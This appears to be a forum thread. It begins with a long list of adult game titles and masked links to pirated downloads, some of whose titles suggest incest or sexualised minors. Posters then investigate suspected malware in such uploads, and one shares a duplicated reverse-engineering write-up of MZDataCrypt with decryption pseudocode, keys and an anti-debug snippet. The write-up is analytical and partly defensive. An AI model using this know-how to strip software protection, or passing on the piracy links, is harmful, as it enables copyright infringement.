Kimberly's Life pixeldrain.c--/u/ri****NA
Sophia's Dark Fantasy pixeldrain.c--/u/9e****KZ
Little Man pixeldrain.c--/u/mz****EE
Proud Father pixeldrain.c--/u/fh****V1
Luna pixeldrain.c--/u/ef****Ce
Priestess Lust pixeldrain.c--/u/y1****UY
That New Teacher pixeldrain.c--/u/2T****6k
Vulgar Stepmother pixeldrain.c--/u/av****3p
Spring for Uta pixeldrain.c--/u/tP****HX
House Chores pixeldrain.c--/u/Qv****aS
PGI-257 pixeldrain.c--/u/Jw****Qd
NTRaholic pixeldrain.c--/u/N2****Nz
Lord Goblin pixeldrain.c--/u/h4****oR
The Rural Homecoming pixeldrain.c--/u/n3****Sw
Three & One the Cursed Mansion pixeldrain.c--/u/Hn****No
Rational Chaos pixeldrain.c--/u/qU****dv
The Mean Cheerleader pixeldrain.c--/u/CW****Xj
Secret Atelier pixeldrain.c--/u/iB****9u
Sketchy Massage pixeldrain.c--/u/5Z****oE
Lust & Magic pixeldrain.c--/u/j6****2Q
Black and White pixeldrain.c--/u/UL****A9
Shadows pixeldrain.c--/u/Kz****M1
E. Dark Path pixeldrain.c--/u/N4****ki
Quiet Girls pixeldrain.c--/u/5Z****hG
Handyman Fantasies pixeldrain.c--/u/Gf****5v
Seed my Wife pixeldrain.c--/u/j1****rf
The Censor pixeldrain.c--/u/rd****Qy
Another Chance pixeldrain.c--/u/GK****kH
Hanako pixeldrain.c--/u/83****j5
Camp Arcadia 0.47b pixeldrain.c--/u/B8****9A
My Hero Academia Hentai Clicker pixeldrain.c--/u/Tb****PS
Brother with Magic Wand 2 pixeldrain.c--/u/M9****gL
Family Crush pixeldrain.c--/u/2f****Nc
Rance 3 pixeldrain.c--/u/gd****8b
Manila Shaw: Blackmail's Obsession pixeldrain.c--/u/yY****MU
My New Life pixeldrain.c--/u/dg****HX
Fake Father pixeldrain.c--/u/rJ****RZ
The Neighbor Wife 2 pixeldrain.c--/u/Sc****Vv
Summer Secret Holiday pixeldrain.c--/u/bE****rg
Personal Assistant pixeldrain.c--/u/a2****iF
The Best Wife pixeldrain.c--/u/yz****ZB
Third Crisis pixeldrain.c--/u/ja****8Y
Such a Sharp Pain V0.11.7 pixeldrain.c--/u/Nz****6k
Infinity Passion pixeldrain.c--/u/8h****eL
HotWife Ashley pixeldrain.c--/u/vc****tm
Inferior Genes 2.0 pixeldrain.c--/u/dX****xs
Camp With Mom Extend pixeldrain.c--/u/Si****io
Life at Windvale pixeldrain.c--/u/KX****Cp
Family Friends: Beyond Home pixeldrain.c--/u/ZD****9v
A Perfect Marriage pixeldrain.c--/u/EC****Cn
Ntred by friend pixeldrain.c--/u/gM****Ps
Foot of the Mountain pixeldrain.c--/u/mj****DE
Suzukas Melody [MASURAO] pixeldrain.c--/u/Qv****2g
My Loyal Pets pixeldrain.c--/u/aS****id
Come Right Inn pixeldrain.c--/u/vZ****Kp
Friendly Blonding pixeldrain.c--/u/tz****P2
The Breaker pixeldrain.c--/u/p9****AW
Under the Mansion HS pixeldrain.c--/u/mB****8j
No Mercy pixeldrain.c--/u/LR****rT
Bern and the Mistery of Unteralterbach with Walkthrough pixeldrain.c--/u/ob****Fg
Family Faring pixeldrain.c--/u/FB****7W
Just What the Doctor Ordened pixeldrain.c--/u/ua****cD
My Dear Wife Mariko's Report pixeldrain.c--/u/iD****uk
Bored Kitty pixeldrain.c--/u/eR****gZ
Seeds of Chaos pixeldrain.c--/u/YD****Vy
Perfect HouseWife pixeldrain.c--/u/He****9f
A Seduced Wife pixeldrain.c--/u/yX****W4
Timestamps Unconditional Love pixeldrain.c--/u/bz****QS
We are Nudist pixeldrain.c--/u/My****9L
NTR Lesson pixeldrain.c--/u/pp****qK
Dr. Yuukos Sex Training pixeldrain.c--/u/Ej****wp
Aunt don't be sad pixeldrain.c--/u/4o****Li
All the Wrong Things 2 pixeldrain.c--/u/La****z3
SexNote pixeldrain.c--/u/9Z****kH
I am a Motherfucker pixeldrain.c--/u/7u****oY
Burned pixeldrain.c--/u/pk****3u
Escape3 R pixeldrain.c--/u/hs****it
My Wife Who Gasps When Embraced by Me, Weaves a Tale of Being Embraced by Another Man pixeldrain.c--/u/51****L1
Corrupted Love pixeldrain.c--/u/rR****fR
Thot on Trial pixeldrain.c--/u/QQ****aV
Our Island pixeldrain.c--/u/3a****as
A Weekend With Jeffs Father pixeldrain.c--/u/cG****QL
Life Together pixeldrain.c--/u/JU****wG
It's not a world for Alyssa pixeldrain.c--/u/nT****Fu
Over the Moon pixeldrain.c--/u/UX****qN
Hard to Love pixeldrain.c--/u/sJ****aK
An Aunt After My Own Heart pixeldrain.c--/u/za****bg
Happy Memories Be Careful What You Trade For pixeldrain.c--/u/Se****rJ
Shackles of Ellswyn pixeldrain.c--/u/Qj****pN
Lost Daughter pixeldrain.c--/u/CE****Gc
Daddy's Hard Time pixeldrain.c--/u/uY****Du
Iro Yoridori pixeldrain.c--/u/yU****oG
Avaria: Chains of Lust pixeldrain.c--/u/zn****yn
Vulgar Reverie pixeldrain.c--/u/nL****Qc
World of Sisters pixeldrain.c--/u/qT****mn
Wife of My Boss pixeldrain.c--/u/U4****YQ
More than a Daughter pixeldrain.c--/u/fB****5D
Emi - New Beginning pixeldrain.c--/u/YF****Xk
The Edge Of pixeldrain.c--/u/uv****PQ
Quickie A Love Hotel Story pixeldrain.c--/u/Be****pa
Romance on the Rails pixeldrain.c--/u/fn****ZB
Academy Tennis Saga pixeldrain.c--/u/pv****Yv
Blended Family pixeldrain.c--/u/KZ****SS
Chelsy pixeldrain.c--/u/2G****JR
Noemis Toscana pixeldrain.c--/u/4x****oZ
HouseWives Yoga pixeldrain.c--/u/Mv****k6
A Lonely Gray Kitten pixeldrain.c--/u/EX****iX
The Stallion pixeldrain.c--/u/Fk****gt
Origin Story pixeldrain.c--/u/sf****KR
IV?AV!! pixeldrain.c--/u/45****e2
I Wanna Fuck my Mom's Best Friend pixeldrain.c--/u/9S****Am
Revenga pixeldrain.c--/u/aU****Za
Anna Exciting Affection pixeldrain.c--/u/ky****ov
Lust is Stranger pixeldrain.c--/u/aU****gj
Lolita Lovin pixeldrain.c--/u/YC****x7
My Daughter Forever pixeldrain.c--/u/PY****yi
The Renaisance pixeldrain.c--/u/D1****va
My Husband's Boss pixeldrain.c--/u/8Q****SH
Sandy Bay pixeldrain.c--/u/e8****gk
CuckTales pixeldrain.c--/u/R6****Bv
The Moans of the Wife Beyond the Wall 3 pixeldrain.c--/u/Wr****sT
Pandora's Box pixeldrain.c--/u/KS****rp
Inmoral Stories Rebecca pixeldrain.c--/u/SZ****CY
Abandoned sisters want to play pixeldrain.c--/u/uu****eu
Amber's Secret Lover pixeldrain.c--/u/iT****Yk
My Sister's Devious Plot pixeldrain.c--/u/eC****As
Off the Record pixeldrain.c--/u/p5****Hm
Maiko pixeldrain.c--/u/iL****LV
Village Slut Transformation pixeldrain.c--/u/A4****8P
Forbidden Kin pixeldrain.c--/u/aQ****WJ
Pale Carnations pixeldrain.c--/u/92****Ni
Harmony Haven pixeldrain.c--/u/vw****xo
Garage Vamp pixeldrain.c--/u/iH****5P
Trouble at Home pixeldrain.c--/u/wB****tG
My Wife is a Football Coach pixeldrain.c--/u/z2****2y
Siblings Delight pixeldrain.c--/u/6H****Tz
School Love and Friends pixeldrain.c--/u/oo****2G
Man's Best Friend pixeldrain.c--/u/6R****7V
Swipe Right for Sugar Mama Sensei pixeldrain.c--/u/rn****fB
The Queen who adopted a goblin pixeldrain.c--/u/yP****pp
Gunnerkrigg Court Trainer Summer Vacation pixeldrain.c--/u/FB****2W
Girl Scout Island pixeldrain.c--/u/ru****XG
The Visit pixeldrain.c--/u/Yt****2n
A wife's Loyalty pixeldrain.c--/u/dh****A2
Mi Unica Hija pixeldrain.c--/u/s8****Gj
Husbands of Evelyn pixeldrain.c--/u/r7****cr
Relative Twins Reverse Rape Me to Get Pregnant! If I'm Caught My Life is Over pixeldrain.c--/u/SL****mB
Alchemist Trainer pixeldrain.c--/u/T3****ua
Chaos Beach A Virgin Boy Pheromone-Fueled Summer of Lust pixeldrain.c--/u/ea****2q
FemBoy Called it Massage pixeldrain.c--/u/Hq****wG
Now and Then pixeldrain.c--/u/Jf****83
Boxed In pixeldrain.c--/u/H1****1w
Heart Problems pixeldrain.c--/u/rH****Hf
Found in Translation pixeldrain.c--/u/bQ****V2
One Summer in LolliWood pixeldrain.c--/u/zA****pm
Iris Chronicle pixeldrain.c--/u/zC****ut
Jessica's Life pixeldrain.c--/u/R2****o7
Love n Life: Happy Student pixeldrain.c--/u/eE****fn
Eve's Story pixeldrain.c--/u/5J****bN
Fictional Story pixeldrain.c--/u/XU****Vx
My LDR Girlfriend became the Plaything for all the Deprived Male Goons pixeldrain.c--/u/73****x8
Wet Summer Days pixeldrain.c--/u/Tp****FQ
Pleasure Echo Erase pixeldrain.c--/u/5L****T7
Neet Angel and N Family pixeldrain.c--/u/7G****tj
Netori Knights pixeldrain.c--/u/y1****UY
DeadLand Fallen Apartment pixeldrain.c--/u/ZL****o5
Tomboy Supremacy pixeldrain.c--/u/Uh****Mt
Nemurimouto pixeldrain.c--/u/EF****v6
Cheerleaders pixeldrain.c--/u/Sj****fQ
Chona (Extras Unlocked) pixeldrain.c--/u/FR****5Y
Man of the House pixeldrain.c--/u/wU****Lc
23 Sisters pixeldrain.c--/u/JM****Yv
My New Girlfriend pixeldrain.c--/u/wR****ur
Lewd Town Adventures pixeldrain.c--/u/oG****j4
The Lust Voyage pixeldrain.c--/u/kU****bZ
The Intern pixeldrain.c--/u/97****up
Under the Same Roof pixeldrain.c--/u/y4****w8
Porn Battle 2 pixeldrain.c--/u/fQ****VL
Long Live The Princess pixeldrain.c--/u/Fr****cT
Satisfy him pixeldrain.c--/u/fw****36
Milf Obsession pixeldrain.c--/u/Na****hr
Part-time Wife's Affair - Ripe Femininity and Passionate Moans pixeldrain.c--/u/y9****Hi
Office Rivals pixeldrain.c--/u/3H****SX
Opportunity: A Sugar Baby Story pixeldrain.c--/u/iM****mo
Love and Submission pixeldrain.c--/u/A1****Xv
My Classmate is AV Actress pixeldrain.c--/u/4C****Kn
Shrink pixeldrain.c--/u/nf****uF
Lydia's New Life pixeldrain.c--/u/fb****MJ
Escape From Ivy And Piper pixeldrain.c--/u/za****X3
Lust Sisters pixeldrain.c--/u/i9****Km
Big Titties Solitaire pixeldrain.c--/u/Zq****DY
NTR Kazoku pixeldrain.c--/u/Hn****KH
Cursed Affection pixeldrain.c--/u/jM****gk
High School Days pixeldrain.c--/u/a6****ok
Gals Collector pixeldrain.c--/u/GL****Kf
In Her Service pixeldrain.c--/u/8o****d9
Futamata pixeldrain.c--/u/dZ****23
Photo Hunt pixeldrain.c--/u/pn****gH
Love and Jealousy pixeldrain.c--/u/13****te
Guilty Pleasure pixeldrain.c--/u/5k****sU
Moving in pixeldrain.c--/u/6s****Pq
The Assistant pixeldrain.c--/u/HH*****Wc
The Guardian pixeldrain.c--/u/Np****gL
Ravenous Arc 2 pixeldrain.c--/u/Sf****5N
Cabin by the Lake pixeldrain.c--/u/js****31
Shop Mistress NTR pixeldrain.c--/u/1W****EK
Misanthropy pixeldrain.c--/u/Gy****iw
A Couple's Duet of Love & Lust pixeldrain.c--/u/Gy****iw
Blacked House pixeldrain.c--/u/Ai****GB
Family, Friends and Strangers pixeldrain.c--/u/mA****tB
- Oct 16, 2010
- 7,582
- 22
- 12,732
The common point of failure for all of these malware are remote payload, this is how they stay undetected. I think the definitive fix for people would be DNS vector - if a bad domain is detected, then the swarm mitigate itself.
Though it's still tricky to catch all Dynamic DNS (which is similar to disposable email - we must ban the entire service or it will be whac-a-mole)
Though it's still tricky to catch all Dynamic DNS (which is similar to disposable email - we must ban the entire service or it will be whac-a-mole)
- Oct 12, 2014
- 121
- 173
regarding "RJ01588706" that was posted here (only checked this one), i think the original source of that is from https://www.tokyotosho.info/search.php?username=Reeffress because all new game that this user posted has heavily obfuscated the json files and other files. no idea if it just obfuscated the file and not doing anything so just be wary on downloading them. claude analysis for it:
How the Obfuscation Works
Tool Identified: MZDataCrypt v1.6.0
This is a known RPG Maker MZ data encryptor. The bid field ("bid":"1.6.0") is literally the tool version. The protection has two layers: data encryption and anti-tamper, both injected directly into rmmz_managers.js.
Layer 1 — Data Encryption
Injection point: DataManager.onXhrLoad in rmmz_managers.js is completely replaced (minified to a single ~7KB line).
Format: Every data/*.json becomes:
{ "uid": "<8 hex chars>", "bid": "1.6.0", "data": "<base64>" }
Key derivation algorithm:
MASTER_KEY = 0xAB (171, hardcoded as window._K)
per_file_key(filename):
t = sum of ASCII char codes of filename (no extension)
return MASTER_KEY XOR (t & 0xFF)
decrypt(base64_data, filename):
bytes = base64_decode(base64_data)
key = per_file_key(filename)
for i: bytes ^= key // single-byte XOR, same key whole file
return utf8_decode(strip_BOM(bytes))
It's a uniform single-byte XOR — the same byte applied to every position. No rolling key, no IV, no real crypto. The uid field looks meaningful but is actually unused in decryption — just a file identifier.
Weakness: Because it's single-byte XOR, the key can be brute-forced in at most 256 tries just by checking if the output is valid UTF-8 JSON — which is exactly what I did. Or you can compute it directly once you know MASTER_KEY = 0xAB.
Precomputed keys (all verified against actual files):
File Key
System 0x2E
Actors 0xC7
MapInfos 0xB6
Skills 0xD9
Map001/010 0x04
Map002/011/020 0x1B
Map003/012/021/030 0x1A
… (sequential by digit sum) …
Note that maps with the same digit sum share a key (e.g. Map001 and Map010 both key to 0x04), which is another weakness.
Layer 2 — Anti-Tamper (NW.js only)
Runs once on first XHR load via if (typeof window._K === 'undefined'). Uses Node.js fs/path modules directly — only works in NW.js (the runtime RPG Maker MZ ships with), not in a browser.
String obfuscation inside the injected code: There's a sub-cipher for its own internal strings:
f341986 = (s) => {
b = Buffer.from(s, 'base64')
for i: b ^= 0x77
return b.toString()
}
Base64 decode → XOR with 0x77. Decoded strings:
'Gx4VMDsyJAFFWRMbGw==' → libGLESv2.dll
'Gx4VMjA7WRMbGw==' → libEGL.dll
'ExIVAhAVAhAOEgQDHhkQWQMSBAM=' → debugbugyesting.test
File integrity checks (v6f3bb0): Reads raw bytes from libGLESv2.dll and libEGL.dll (NW.js runtime DLLs shipped with the game) and checks:
Exact file size
32 bytes at a specific offset match a hardcoded hex string
Last 16 bytes of the file are all zeros
If either check fails → window.close(); process.exit() immediately kills the game. This prevents replacing the NW.js runtime with a patched version.
DevTools blocking: F12/F8 open DevTools only if a folder named debugbugyesting.test exists in the game directory. Otherwise nothing happens. F10 triggers a full self-scan of all data/*.json files to verify they decrypt correctly.
Summary
Aspect Detail
Tool MZDataCrypt 1.6.0
Data cipher Single-byte XOR (trivially reversible)
Key source 0xAB XOR (sum_of_filename_chars & 0xFF)
Master key Hardcoded 0xAB in window._K
Anti-tamper NW.js DLL byte-pattern check (libGLESv2.dll, libEGL.dll)
DevTools gate Requires debugbugyesting.test/ folder to exist
String obfuscation Base64 + XOR 0x77 for internal filenames
Injection point DataManager.onXhrLoad in rmmz_managers.js
How the Obfuscation Works
Tool Identified: MZDataCrypt v1.6.0
This is a known RPG Maker MZ data encryptor. The bid field ("bid":"1.6.0") is literally the tool version. The protection has two layers: data encryption and anti-tamper, both injected directly into rmmz_managers.js.
Layer 1 — Data Encryption
Injection point: DataManager.onXhrLoad in rmmz_managers.js is completely replaced (minified to a single ~7KB line).
Format: Every data/*.json becomes:
{ "uid": "<8 hex chars>", "bid": "1.6.0", "data": "<base64>" }
Key derivation algorithm:
MASTER_KEY = 0xAB (171, hardcoded as window._K)
per_file_key(filename):
t = sum of ASCII char codes of filename (no extension)
return MASTER_KEY XOR (t & 0xFF)
decrypt(base64_data, filename):
bytes = base64_decode(base64_data)
key = per_file_key(filename)
for i: bytes ^= key // single-byte XOR, same key whole file
return utf8_decode(strip_BOM(bytes))
It's a uniform single-byte XOR — the same byte applied to every position. No rolling key, no IV, no real crypto. The uid field looks meaningful but is actually unused in decryption — just a file identifier.
Weakness: Because it's single-byte XOR, the key can be brute-forced in at most 256 tries just by checking if the output is valid UTF-8 JSON — which is exactly what I did. Or you can compute it directly once you know MASTER_KEY = 0xAB.
Precomputed keys (all verified against actual files):
File Key
System 0x2E
Actors 0xC7
MapInfos 0xB6
Skills 0xD9
Map001/010 0x04
Map002/011/020 0x1B
Map003/012/021/030 0x1A
… (sequential by digit sum) …
Note that maps with the same digit sum share a key (e.g. Map001 and Map010 both key to 0x04), which is another weakness.
Layer 2 — Anti-Tamper (NW.js only)
Runs once on first XHR load via if (typeof window._K === 'undefined'). Uses Node.js fs/path modules directly — only works in NW.js (the runtime RPG Maker MZ ships with), not in a browser.
String obfuscation inside the injected code: There's a sub-cipher for its own internal strings:
f341986 = (s) => {
b = Buffer.from(s, 'base64')
for i: b ^= 0x77
return b.toString()
}
Base64 decode → XOR with 0x77. Decoded strings:
'Gx4VMDsyJAFFWRMbGw==' → libGLESv2.dll
'Gx4VMjA7WRMbGw==' → libEGL.dll
'ExIVAhAVAhAOEgQDHhkQWQMSBAM=' → debugbugyesting.test
File integrity checks (v6f3bb0): Reads raw bytes from libGLESv2.dll and libEGL.dll (NW.js runtime DLLs shipped with the game) and checks:
Exact file size
32 bytes at a specific offset match a hardcoded hex string
Last 16 bytes of the file are all zeros
If either check fails → window.close(); process.exit() immediately kills the game. This prevents replacing the NW.js runtime with a patched version.
DevTools blocking: F12/F8 open DevTools only if a folder named debugbugyesting.test exists in the game directory. Otherwise nothing happens. F10 triggers a full self-scan of all data/*.json files to verify they decrypt correctly.
Summary
Aspect Detail
Tool MZDataCrypt 1.6.0
Data cipher Single-byte XOR (trivially reversible)
Key source 0xAB XOR (sum_of_filename_chars & 0xFF)
Master key Hardcoded 0xAB in window._K
Anti-tamper NW.js DLL byte-pattern check (libGLESv2.dll, libEGL.dll)
DevTools gate Requires debugbugyesting.test/ folder to exist
String obfuscation Base64 + XOR 0x77 for internal filenames
Injection point DataManager.onXhrLoad in rmmz_managers.js
- Oct 12, 2014
- 121
- 173
new game that was posted here, same info as above RJ01596306 but newer version?
MZDataCrypt — v1.6.0 vs v1.10.0 Reverse Engineering Notes
Two RPG Maker MZ doujin games analyzed, both protected by MZDataCrypt. Same tool, significant encryption upgrade between versions.
Overview
Data Format
Every data/*.json is replaced with:
v1.6.0 — Key Derivation
Simple and weak. Single-byte XOR, same key applied to every byte in the file.
Weakness: Single-byte XOR can be brute-forced in at most 256 tries by checking if output is valid UTF-8 JSON. Filenames with the same char-code sum share keys (e.g. Map001 and Map010 both → 0x04).
Precomputed keys (v1.6.0):
v1.10.0 — Key Derivation
Significant upgrade. Uses djb2 hash and a rolling stream cipher with ciphertext feedback.
Step 1 — Filename hash (djb2):
djb2 distributes hashes much better — Map001/Map010 no longer collide.
Step 2 — Base file key:
(In JS, XOR is written as (a | b) & ~(a & b) to obscure intent)
Step 3 — Rolling stream cipher:
Key difference from v1.6.0: This is a stream cipher with ciphertext feedback. Each byte's key depends on all previously decrypted bytes. You cannot brute-force file-by-file without knowing _K, because a wrong key cascades into garbage immediately.
Injection Point
Both versions patch DataManager.onXhrLoad inside js/rmmz_managers.js, minified to a single line (~7–9KB). The entire function is replaced.
Anti-Tamper — Both Versions
Runs once on first XHR load via if (typeof window._K === 'undefined'). NW.js only (uses Node.js require('fs') / require('path')).
DLL integrity check: Reads raw bytes from the NW.js runtime DLLs and verifies:
If either check fails → window.close(); process.exit() immediately.
DevTools blocking: F12/F8 only open DevTools if the dev folder exists. The folder name changed between versions — v1.6.0 used a readable name, v1.10.0 uses randomized gibberish.
String obfuscation for internal filenames:
v1.10.0 Only — Active Anti-Debug
New in v1.10.0. If the dev folder is absent, fires a debugger trap every 50ms:
Uses Function.constructor instead of the literal debugger keyword to evade simple string searches. Makes DevTools nearly unusable without disabling this interval first.
as for RJ01569430, bought the original and compare, the difference was on "renpy" folder.
MZDataCrypt — v1.6.0 vs v1.10.0 Reverse Engineering Notes
Two RPG Maker MZ doujin games analyzed, both protected by MZDataCrypt. Same tool, significant encryption upgrade between versions.
Overview
| Aspect | v1.6.0 | v1.10.0 |
|---|---|---|
| bid field | 1.6.0 | 1.10.0 |
| Master key _K | 171 (0xAB) | 211 (0xD3) |
| Filename hash | Sum of char codes | djb2 rolling hash |
| Per-byte cipher | Flat single-byte XOR | Rolling stream cipher w/ feedback |
| String cipher | base64 + XOR 0x77 | base64 + XOR 0x61 (bitwise disguise) |
| Dev folder | debugbugyesting.test | oK5dpQ1prR2ml6xG8ceI0ksH4ndW3i.test |
| Anti-debugger | None | setInterval(debugger) every 50ms |
| DLL integrity | libGLESv2 + libEGL | Same (identical expected hashes) |
Data Format
Every data/*.json is replaced with:
Code:
{
"uid": "<8 hex chars>", // per-file identifier, NOT used in decryption
"bid": "1.x.x", // tool version
"data": "<base64>" // encrypted payload
}v1.6.0 — Key Derivation
Simple and weak. Single-byte XOR, same key applied to every byte in the file.
Code:
MASTER_KEY = 0xAB // 171, hardcoded as window._K
function getFileKey(filename): // no extension
t = sum of charCode(c) for each c in filename
return MASTER_KEY XOR (t & 0xFF)
function decrypt(base64_data, filename):
bytes = base64_decode(base64_data)
key = getFileKey(filename)
for i in range(len(bytes)):
bytes[i] ^= key // uniform XOR, trivially reversible
return utf8_decode(strip_BOM(bytes))Weakness: Single-byte XOR can be brute-forced in at most 256 tries by checking if output is valid UTF-8 JSON. Filenames with the same char-code sum share keys (e.g. Map001 and Map010 both → 0x04).
Precomputed keys (v1.6.0):
Code:
System → 0x2E Actors → 0xC7 MapInfos → 0xB6
Skills → 0xD9 States → 0xDF Troops → 0x2C
Weapons → 0x76 Tilesets → 0xE6 Items → 0xA9
Enemies → 0x6D Armors → 0xDF Classes → 0x65
Map001/010 → 0x04 Map002/011/020 → 0x1B
Map003/012/021/030 → 0x1A (sequential by digit sum)v1.10.0 — Key Derivation
Significant upgrade. Uses djb2 hash and a rolling stream cipher with ciphertext feedback.
Step 1 — Filename hash (djb2):
Code:
t = 0
for each char c in filename (no extension):
t = (t << 5) - t + charCode(c) // djb2: t * 31 + c
t &= 0xFFFFFFFF // keep 32-bitdjb2 distributes hashes much better — Map001/Map010 no longer collide.
Step 2 — Base file key:
Code:
fk = _K XOR (t & 0xFF) // _K = 211 (0xD3)(In JS, XOR is written as (a | b) & ~(a & b) to obscure intent)
Step 3 — Rolling stream cipher:
Code:
l = fk // initial state
for each byte i:
rotated = ((l << 4) XOR (l >> 2)) & 0xFF
k = ((fk XOR 60) + (i % 256) + rotated) XOR 122 + 19 (mod 256)
decrypted = raw[i] XOR k
raw[i] = decrypted
l = decrypted // ← feedback: next key depends on previous OUTPUTKey difference from v1.6.0: This is a stream cipher with ciphertext feedback. Each byte's key depends on all previously decrypted bytes. You cannot brute-force file-by-file without knowing _K, because a wrong key cascades into garbage immediately.
Injection Point
Both versions patch DataManager.onXhrLoad inside js/rmmz_managers.js, minified to a single line (~7–9KB). The entire function is replaced.
Anti-Tamper — Both Versions
Runs once on first XHR load via if (typeof window._K === 'undefined'). NW.js only (uses Node.js require('fs') / require('path')).
DLL integrity check: Reads raw bytes from the NW.js runtime DLLs and verifies:
- Exact file size
- 32 bytes at a specific offset match a hardcoded hex string
- Last 16 bytes of the file are all zeros
Code:
// Targets (both versions, identical expected hashes):
libGLESv2.dll size=8192528 offset=10000 hash=D34889CF488B054DE375...
libEGL.dll size=386576 offset=5000 hash=2558000000488B0CCA3B...If either check fails → window.close(); process.exit() immediately.
DevTools blocking: F12/F8 only open DevTools if the dev folder exists. The folder name changed between versions — v1.6.0 used a readable name, v1.10.0 uses randomized gibberish.
String obfuscation for internal filenames:
Code:
// v1.6.0: base64_decode(s), then XOR each byte with 0x77
// v1.10.0: base64_decode(s), then XOR each byte with 0x61
// (written as (b[i] | 97) & ~(b[i] & 97) to hide the XOR)v1.10.0 Only — Active Anti-Debug
New in v1.10.0. If the dev folder is absent, fires a debugger trap every 50ms:
Code:
setInterval(function() {
(function(){}).constructor('debugger')();
}, 50);Uses Function.constructor instead of the literal debugger keyword to evade simple string searches. Makes DevTools nearly unusable without disabling this interval first.
as for RJ01569430, bought the original and compare, the difference was on "renpy" folder.
Last edited:
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
- Apr 13, 2011
- 123,790
- 3
- 38,017
- Oct 12, 2014
- 121
- 173
not sure if there is a hidden malware on it or not, the one i check RJ01588706
libEGL.dll & libGLESv2.dll has only extra zero bytes at the end of it.
rmmz_managers.js contain the decryption to the json files. and that's it i think.
and another new game that was posted here RJ01464379 same style obfuscation probably some different on some parts because it was RPG Maker MV instead of MZ.
Last edited:
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
New info, the same malware comes from a spanish guy that was infecting RenPy games/mod galleries on f95, i will quote 'colobancuz' analysis on the previous version of the malware:
Infected files:
Previous RenPy malware analysis (F95):
This file (zaesdl) also contains the same C2 url from the RPGM version, so its the same RAT:
Infected files:
Previous RenPy malware analysis (F95):
This file (zaesdl) also contains the same C2 url from the RPGM version, so its the same RAT:
